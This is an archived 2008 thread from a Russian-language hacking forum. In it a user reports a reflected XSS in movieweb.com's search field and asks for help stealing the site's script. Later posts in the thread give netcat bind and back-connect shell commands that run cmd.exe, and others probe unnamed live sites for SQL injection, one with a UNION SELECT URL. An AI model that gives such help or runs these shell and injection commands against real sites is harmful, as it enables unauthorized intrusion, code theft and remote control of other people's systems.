ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
21.12.2008, 22:46
|
|
Новичок
Регистрация: 21.12.2008
Сообщений: 3
Провел на форуме:
13074
Репутация:
10
|
|
Вопрос о XSS
Здравствуйте.
У меня к вам вот какой вопрос, есть сайт movieweb.com очень хочется его слить, но честное слово незнаю как это делается 
Проверил на XSS в графе поиск фильма проходит
Код:
"><script>alert(555)</script>
, а что дальше делать незнаю
На форуме nulled.ws народ как-то делает рипы. Помогите сделать рип этого сайта или подскажите. что делать.
Заранее Вас благодарю. |
|
|
21.12.2008, 22:52
|
|
Reservists Of Antichat - Level 6
Регистрация: 09.07.2008
Сообщений: 102
Провел на форуме:
1744345
Репутация:
573
|
|
Сообщение от WaterSpirit
Здравствуйте.
У меня к вам вот какой вопрос, есть сайт movieweb.com очень хочется его слить, но честное слово незнаю как это делается
Проверил на XSS в графе поиск фильма проходит
Код:
"><script>alert(555)</script>
, а что дальше делать незнаю
На форуме nulled.ws народ как-то делает рипы. Помогите сделать рип этого сайта или подскажите. что делать.
Заранее Вас благодарю. Если XSS пассивная, то я сомневаюсь, что тебе удастся что-то сделать... Шансов мало. Нужно что-то более действенное
|
|
|
|
21.12.2008, 22:56
|
|
Новичок
Регистрация: 21.12.2008
Сообщений: 3
Провел на форуме:
13074
Репутация:
10
|
|
Сообщение от The matrix
Если XSS пассивная, то я сомневаюсь, что тебе удастся что-то сделать... Шансов мало. Нужно что-то более действенное
Если честно незнаю какая
|
|
|
|
21.12.2008, 22:58
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от WaterSpirit
Здравствуйте.
У меня к вам вот какой вопрос, есть сайт movieweb.com очень хочется его слить, но честное слово незнаю как это делается
Проверил на XSS в графе поиск фильма проходит
Код:
"><script>alert(555)</script>
, а что дальше делать незнаю
На форуме nulled.ws народ как-то делает рипы. Помогите сделать рип этого сайта или подскажите. что делать.
Заранее Вас благодарю. Здравствуйте, по манере выражаться, Вы производите впечатление интелигентного человека, а вот по смыслу вопроса, о Вас такого не скажешь 
С помощью пассивной XSS врятли Вам удастся сделать рип сайта , что-же касается Вашего вопроса по поводу "подскажите", думаю Вам для начала стоит поискать информацию по теме XSS, и ознакомится с ней, это тема не предназначена для ответов на такие обширные вопросы , рекоммендую прочесть и понять то , что написано сдесь:
http://old.antichat.ru/crackchat/index.html
https://forum.antichat.ru/thread20140.html
|
|
|
|
21.12.2008, 23:13
|
|
Новичок
Регистрация: 21.12.2008
Сообщений: 3
Провел на форуме:
13074
Репутация:
10
|
|
Сообщение от jokester
Здравствуйте, по манере выражаться, Вы производите впечатление интелигентного человека, а вот по смыслу вопроса, о Вас такого не скажешь
С помощью пассивной XSS врятли Вам удастся сделать рип сайта , что-же касается Вашего вопроса по поводу "подскажите", думаю Вам для начала стоит поискать информацию по теме XSS, и ознакомится с ней, это тема не предназначена для ответов на такие обширные вопросы , рекоммендую прочесть и понять то , что написано сдесь:
http://old.antichat.ru/crackchat/index.html
https://forum.antichat.ru/thread20140.html Спасибо, что ответили, а также за просвеление примерно понял, что такое XSS. Что касаемо вопроса, то уже достаточно давно ищю скрипт что-то между кинопоиска и стандартного видеокаталога. А этот сайт как раз то что нужно. Такого скрипта наврядли где найдешь. Вот и мучает вопрос как с сие чудо мысли сделать рип. На другом форуме рипы делают но скрывают за такими сообщениями, которые я буду набирать года два не меньше это если с флудом, что не очень правильно. Поэтому пришел к мысли либо кого-то попросить рипануть либо как-нить самому это сделать, потому как аналогов я еще пока не видел.
Заранее прошу прощения за данное сообщение, так как оно может расцениватся как флуд.
|
|
|
|
22.12.2008, 08:48
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
подставляю ковычку
он мне выдает
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'cint'
/instructorDesc.asp, line 45
возможна ли скуль?
|
|
|
|
22.12.2008, 09:23
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
У MJDE должна быть немного другая ошибка. Полагаю, что тут инъекции нету.
|
|
|
|
22.12.2008, 15:32
|
|
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663
Репутация:
240
|
|
Сообщение от SHS
Как порт слушать я то знаю, только при коннекте команды не исполняются, а просто выводятся на экран (то что напишешь)
nc -l -p ПОРТ -d -e cmd.exe -BIND
nc host порт -d -e cmd.exe -Back-Connect
Последний раз редактировалось The_HuliGun; 22.12.2008 в 15:36..
|
|
|
|
22.12.2008, 18:01
|
|
Познающий
Регистрация: 04.08.2008
Сообщений: 53
Провел на форуме:
63941
Репутация:
2
|
|
Спасиб  |
|
|
|
22.12.2008, 18:23
|
|
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
Провел на форуме:
584540
Репутация:
96
|
|
Товарищи выручите плз еще раз 
Такая ситуация, нашел иньекцию на сайте(версия мускула > 5 ), Нашел колонку которая интересна, теперь при запросе:
xxx.com/index.php?id=-1+union+select+1,2,3+from+user/*
Мне выдает:
Table 'sitename.user' doesn't exist
В чем ошибка? O_O
P.S. ссылку не дам |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
